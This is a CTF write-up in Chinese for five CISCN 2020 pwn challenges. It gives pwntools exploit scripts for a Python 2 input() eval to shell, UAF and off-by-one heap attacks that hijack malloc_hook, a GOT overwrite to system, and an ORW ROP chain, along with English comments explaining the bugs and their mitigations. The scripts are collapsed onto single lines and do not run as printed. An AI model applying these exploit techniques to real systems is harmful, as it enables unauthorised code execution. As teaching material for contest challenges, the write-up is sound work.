CISCN2020 PWNwp


CISCN2020 PWNwp


国赛嘛,不想说啥

目录

      • babyjsc
      • maj
      • easyboxs
      • nofree
      • wow
      • 总结

babyjsc

非预期解:题目用 Python 的 input() 读取输入,而 Python 2 的 input() 会把输入当作表达式求值,因此构成命令执行漏洞。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
# babyjsc: the whole function body sits on ONE physical line on this page, so
# the text below is a record of the solve rather than a runnable script; it is
# kept verbatim.
# Defender's reading: per the writeup the service reads text with Python's
# input(); under Python 2 that call evaluates the text as an expression, which
# is why the string sent here (a plain Python expression) runs on the server.
# raw_input() / Python 3 input() return the text unevaluated and would close
# this entirely.
# Notes on the code itself: `debug` is accepted but never read (the connection
# is always remote), and `p` is a local here -- there is no `global p`, so the
# module-level `p` is never updated.
def pwn(ip,port,debug):p = remote(ip,port)payload='''__import__('os').system('sh')'''p.sendline(payload)p.interactive()
# Entry point. The third argument is ignored by pwn(), so this always connects
# to the contest instance named in the writeup (IP and port as given there).
if __name__ == '__main__':pwn('101.200.53.148',13465,0)

maj

UAF;程序没有打印函数,于是先更改 IO_stdout 来泄露 libc 地址,再把 malloc_hook 改成 one_gadget 地址拿 shell。
脚本成功率为 1/16(两字节部分覆写时要猜中 4 位随机地址)。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
# pwntools setup: echo every byte sent/received, and pack/unpack as 64-bit
# (amd64) for p64/u64.
context.update(arch='amd64', log_level='debug')
# Challenge binary parsed by pwntools' ELF loader. `elf` is not referenced
# anywhere in the script that follows.
elf = ELF('pwn')
# Connection handle; pwn() rebinds it through `global p`.
p = 0
# maj: driver for the use-after-free described above. Everything from
# `def pwn` to `p.interactive()` sits on ONE physical line on this page, and the
# inline `# delete(1)` comment swallows the remainder of that line, so the text
# is a record of the attack sequence, not a runnable script; kept verbatim.
# Defender's reading of the sequence:
#  - add/add2, free/free2, edit/edit2 differ only in whether the prompt they
#    wait for ends in '\n' -- the service's prompts are not consistent and the
#    script works around that.
#  - the primitive is edit()/free() on an index that has already been freed
#    (free(1) ... edit(1,'\x10'), later free(1) twice more); clearing the slot
#    on free and rejecting stale indexes would remove it.
#  - edit(1,'\xdd\x25') is a two-byte partial overwrite of a freed chunk's
#    forward pointer; the nibble above the written bytes is randomised by
#    ASLR, consistent with the 1/16 success rate the writeup gives.
#  - per the writeup, the 0xfbad1800 value written via add(0x60,...)/edit(6,...)
#    targets stdout's flags so that a program with no print function still
#    leaks a libc pointer; libcbase_addr, one_gagedt and malloc_hook are all
#    derived from that leak.
# Python 2 syntax (print statement); pause() is a manual stop for debugging.
def pwn(ip,port,debug):global pif(debug == 1):p = process('./pwn')else:p = remote(ip,port)def add(size,content):p.sendlineafter(">> ","1")p.sendlineafter("please answer the question\n\n","80")p.sendlineafter("______?\n",str(size))p.sendlineafter("start_the_game,yes_or_no?\n",content)def add2(size,content):p.sendlineafter(">> ","1")p.sendlineafter("please answer the question\n","80")p.sendlineafter("______?",str(size))p.sendlineafter("start_the_game,yes_or_no?",content)def free2(index):p.sendlineafter(">> ","2")p.sendlineafter("index ?",str(index))def free(index):p.sendlineafter(">> ","2")p.sendlineafter("index ?\n",str(index))def edit(index,content):p.sendlineafter(">> ","4")p.sendlineafter("index ?\n",str(index))p.sendafter("__new_content ?\n",content)def edit2(index,content):p.sendlineafter(">> ","4")p.sendlineafter("index ?",str(index))p.sendafter("__new_content ?",content)add(0x60,p64(0) + p64(0x71))add(0x60,p64(0) + p64(0x51))add(0x60,p64(0)*3 + p64(0x51))edit(0,p64(0) + p64(0x71))edit(1,p64(0) + p64(0x51))edit(2,p64(0)*3 + p64(0x51))free(0)free(1)edit(1,'\x10')add(0x60,'a')# delete(1)add(0x60,p64(0)*0xb + p64(0x71))edit(4,p64(0)*0xb + p64(0x71))free(1)edit(4,p64(0)*0xb + p64(0x91))free(1)edit(4,p64(0)*0xb + p64(0x71))#0x25ddedit(1,'\xdd\x25')add(0x60,'a')#5add(0x60,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')#6edit(6,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')one = [0x45226,0x4527a,0xf0364,0xf1207]p.recv(0x40)libcbase_addr=u64(p.recv(6).ljust(8,"\x00"))-0x3c5600print "baseaddr=",hex(libcbase_addr)pause()one_gagedt=libcbase_addr+one[3]libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")malloc_hook=libcbase_addr+libc.symbols["__malloc_hook"]fuck_chunk = malloc_hook - 0x23add2(0x60,'a')#7free2(7)edit2(7,p64(fuck_chunk))add2(0x60,'a')#8add2(0x60,'b'*0x13 + p64(one_gagedt))#9edit2(9,'b'*0x13 + p64(one_gagedt))p.sendlineafter(">> ","1")p.sendlineafter("please answer the question\n","80")p.sendlineafter("______?","60")#gdb.attach(p)p.interactive()
# Entry point. debug=0 selects the remote contest instance (address as given
# in the writeup); debug=1 would instead run ./pwn locally via process().
if __name__ == '__main__':pwn('101.200.53.148',15423,0)

easyboxs

off-by-one,同样是没有打印函数,真有意思,感觉除了洞不一样,跟maj基本没啥区别

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
# pwntools setup: echo every byte sent/received, and pack/unpack as 64-bit
# (amd64) for p64/u64.
context.update(arch='amd64', log_level='debug')
# Challenge binary parsed by pwntools' ELF loader. `elf` is not referenced
# anywhere in the script that follows.
elf = ELF('pwn')
# Connection handle; pwn() rebinds it through `global p`.
p = 0
# easyboxs: driver for the off-by-one described above. The whole body sits on
# ONE physical line on this page, so it is a record of the sequence rather than
# a runnable script; kept verbatim.
# Defender's reading:
#  - add(0,0x18,"A"*0x18+"\xe1") sends 0x19 bytes for a 0x18-byte request; that
#    one extra byte is the off-by-one the writeup names and, by the value used
#    (0xe1), it apparently lands on the adjacent chunk's size field. A strict
#    length check on the content read would remove the bug.
#  - after that the script mirrors maj: the same 0xfbad1800 write described in
#    the writeup as the stdout trick for leaking libc with no print function,
#    the same '\xdd\x25' two-byte partial overwrite (so presumably the same
#    ~1/16 success rate), then __malloc_hook -> one_gadget (one_gagedt).
#  - add/add2 and free/free2 differ only in the trailing '\n' of the prompts
#    they wait for.
# Python 2 syntax (print statement); pause() is a manual stop for debugging.
def pwn(ip,port,debug):global pif(debug == 1):p = process('./pwn')else:p = remote(ip,port)def add(index,size,content):p.sendlineafter(">>>\n",'1')p.sendlineafter("idx:\n",str(index))p.sendlineafter("len:\n",str(size))p.sendafter("content:\n",content)def add2(index,size,content):p.sendlineafter(">>>",'1')p.sendlineafter("idx:",str(index))p.sendlineafter("len:",str(size))p.sendafter("content:",content)def free(index):p.sendlineafter(">>>\n",'2')p.sendlineafter("idx:\n",str(index))def free2(index):p.sendlineafter(">>>",'2')p.sendlineafter("idx:",str(index))add(0,0x18,"A"*0x18)add(1,0xf8,"A")add(2,0x68,"B")add(3,0x68,"C")add(4,0x18,"D")free(0)add(0,0x18,"A"*0x18+"\xe1")free(1)free(2)add(0,0xd8,"A")add(5,0x18,"A")add(0,0x28,'\xdd\x25')free(5)add(5,0x18,"A"*0x18+"\x71")add(0,0x68,'a')add(0,0x68,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')one= [0x45226,0x4527a,0xf0364,0xf1207]p.recv(0x40)libcbase_addr=u64(p.recv(6).ljust(8,"\x00"))-0x3c5600print "baseaddr=",hex(libcbase_addr)pause()one_gagedt=libcbase_addr+one[3]libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")malloc_hook=libcbase_addr+libc.symbols["__malloc_hook"]fuck_chunk = malloc_hook - 0x23free2(3)add2(0,0xa1,p64(0)*7+p64(0x71)+p64(fuck_chunk))add2(0,0x68,'a')add2(0,0x68,'b'*0x13 + p64(one_gagedt))p.sendlineafter(">>>",'1')p.sendlineafter("idx:",'1')p.sendlineafter("len:",'20')#gdb.attach(p)p.interactive()
# Entry point. debug=0 selects the remote contest instance (address as given
# in the writeup); debug=1 would instead run ./pwn locally via process().
if __name__ == '__main__':pwn('101.200.53.148',34521,0)

nofree

这题是我们 whali3n51 师傅做的:top chunk 攻击拿到任意写后,修改 GOT 表制造格式化字符串漏洞泄露 libc,再把 GOT 表项改成 system。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
# pwntools setup: echo every byte sent/received, and pack/unpack as 64-bit
# (amd64) for p64/u64.
context.update(arch='amd64', log_level='debug')
# Challenge binary parsed by pwntools' ELF loader. `elf` is not referenced
# anywhere in the script that follows.
elf = ELF('pwn')
# Connection handle; pwn() rebinds it through `global p`.
p = 0
# nofree: whali3n51's driver for the top-chunk attack described above. The
# service offers no free, so only add/edit are used. The body sits on ONE
# physical line on this page (it also contains a literal tab); it is a record
# of the sequence, not a runnable script, and is kept verbatim.
# Defender's reading:
#  - 0x18 allocations of 0x90 are made first, then edit(0,"x"*0x18+p64(0xe1))
#    writes well past the 0x18 bytes chunk 0 was filled with; edit() evidently
#    does not bound the write by the chunk's size, which is the defect.
#  - the later edits place fixed addresses (0x602140, 0x602068) into chunk
#    metadata so that subsequent add() calls hand out memory at those
#    addresses; hard-coded addresses mean the binary is not PIE and, per the
#    writeup, 0x602068 is in a writable GOT.
#  - the GOT slot is first pointed at 0x400700 so that add(0,0x10,"%17$p")
#    acts as a format-string leak (the script reads the "0x..." that comes
#    back to derive libcbase_addr), then repointed at system() and triggered
#    with add(0,0x10,"sh"). PIE plus Full RELRO would defeat both steps; a
#    size-bounded edit() would remove the root cause.
# Python 2 syntax (print statement).
def pwn(ip,port,debug):global pif(debug == 1):p = process('./pwn')else:p = remote(ip,port)def add(idx,size,content):p.sendlineafter("choice>> ","1")p.sendlineafter("idx: ",str(idx))p.sendlineafter("size: ",str(size))	p.sendafter("content: ",content)def edit(idx,content):p.sendlineafter("choice>> ","2")p.sendlineafter("idx: ",str(idx))p.sendafter("content: ",content)for i in range(0x18):add(0,0x90,'x'*0x90)add(0,0x90,'\x00')edit(0,"x"*0x18+p64(0xe1))add(1,0x90,'x'*0x30)add(0,0x90,'x'*0x90)edit(1,"x"*0x38+p64(0x81)+p64(0x602140))add(0,0x90,'x'*0x77)add(2,0x90,'x'*0x77+'\x00'*17+p64(0x81))edit(2,"x"*0x70+p64(0x602068))edit(0,p64(0x400700))add(0,0x10,"%17$p")p.recvuntil("0x")libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")libcbase_addr=int(p.recv(12),16)-0x20840edit(2,"x"*0x70+p64(0x602068))system_addr=libcbase_addr+libc.symbols['system']print "system_addr=",hex(system_addr)edit(0,p64(system_addr))add(0,0x10,"sh")#gdb.attach(p)p.interactive()
# Entry point. debug=0 selects the remote contest instance (address as given
# in the writeup); debug=1 would instead run ./pwn locally via process().
if __name__ == '__main__':pwn('101.200.53.148',12301,0)

wow

单字节溢出,通过修改部分指针来控制返回地址,写入 ORW(open/read/write)的 ROP 链读出 flag。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
# pwntools setup: echo every byte sent/received, and pack/unpack as 64-bit
# (amd64) for p64/u64.
context.update(arch='amd64', log_level='debug')
# Challenge binary parsed by pwntools' ELF loader. `elf` is not referenced
# anywhere in the script that follows.
elf = ELF('wow')
# Connection handle; pwn() rebinds it through `global p`.
p = 0
# wow: driver for the single-byte overflow described above. The body sits on
# ONE physical line on this page; it is a record of the sequence, not a
# runnable script, and is kept verbatim.
# Defender's reading:
#  - the challenge runs a tiny custom language whose one-character ops are
#    bound to the names addr_p/addr_d/value_p/value_d/write/read/loop1/loop2
#    below; the first two programs each end by sending a single byte
#    ("\xd0", then "\xf8") -- that lone byte is the overflow the writeup
#    names, used first to leak a stack address (stack_addr) and then to
#    redirect a pointer at a return address (ret_addr = stack_addr - 0x598).
#  - the return address is steered to a stack pivot (poprsp) onto an ORW
#    chain: open with rax=2 on the "flag\x00" string appended to ROP,
#    read(3, buf, 0x30) with rax=0, write(1, buf, 0x30) with rax=1, all via
#    syscall_ret. Every gadget is a fixed address, so the binary is not PIE.
#  - mitigations that would break the chain: bounds-check the single-byte
#    write in the interpreter, build with PIE, and keep a stack canary.
# Python 2 syntax (print statement); pause() is a manual stop for debugging.
def pwn(ip,port,debug):global pif(debug == 1):p = process('./wow')else:p = remote(ip,port)poprax=0x41ea0apoprsi=0x407578poprdx=0x40437fpoprdi=0x4047bapoprsp=0x405831syscall_ret=0x4dc054addr_p='@'addr_d='#'value_p='^'value_d='|'write='&'read='$'loop1='{'loop2='}'p.recvuntil("our code:\n")p.sendline(value_p+loop1+addr_p+value_p+loop2+read)p.recvuntil("running....")p.send("\xd0")p.recvuntil("code: ")stack_addr=u64(p.recv(6).ljust(8,"\x00"))print "stack_addr=",hex(stack_addr)p.sendafter("continue?\n",'y')p.sendlineafter('enter your code:\n',value_p+loop1+addr_p+value_p+loop2+read)p.recvuntil("running....")p.send("\xf8")p.sendafter("continue?\n",'y')ret_addr=stack_addr-0x598p.sendlineafter('enter your code:\n',value_p+loop1+read+addr_p+value_p+loop2+read+'c'+p64(0)+p64(poprsp)+p64(ret_addr))ROP=''ROP+=p64(poprdi)+p64(stack_addr-0x4d0)+p64(poprsi)+p64(72)+p64(poprax)+p64(2)+p64(syscall_ret)ROP+=p64(poprdi)+p64(3)+p64(poprsi)+p64(stack_addr-0x49e)+p64(poprdx)+p64(0x30)+p64(poprax)+p64(0)+p64(syscall_ret)ROP+=p64(poprdi)+p64(1)+p64(poprsi)+p64(stack_addr-0x49e)+p64(poprdx)+p64(0x30)+p64(poprax)+p64(1)+p64(syscall_ret)ROP+="flag\x00"pause()p.send(ROP)p.send('\xb0'*820)p.sendafter("continue?\n",'n')p.interactive()
# Entry point. debug=0 selects the remote contest instance (address as given
# in the writeup); debug=1 would instead run ./wow locally via process().
if __name__ == '__main__':pwn('101.200.53.148',15324,0)

总结

pwn感觉有点套娃,尤其是maj与easyboxs差不多一样。个人觉得没啥新的知识点或者创意。
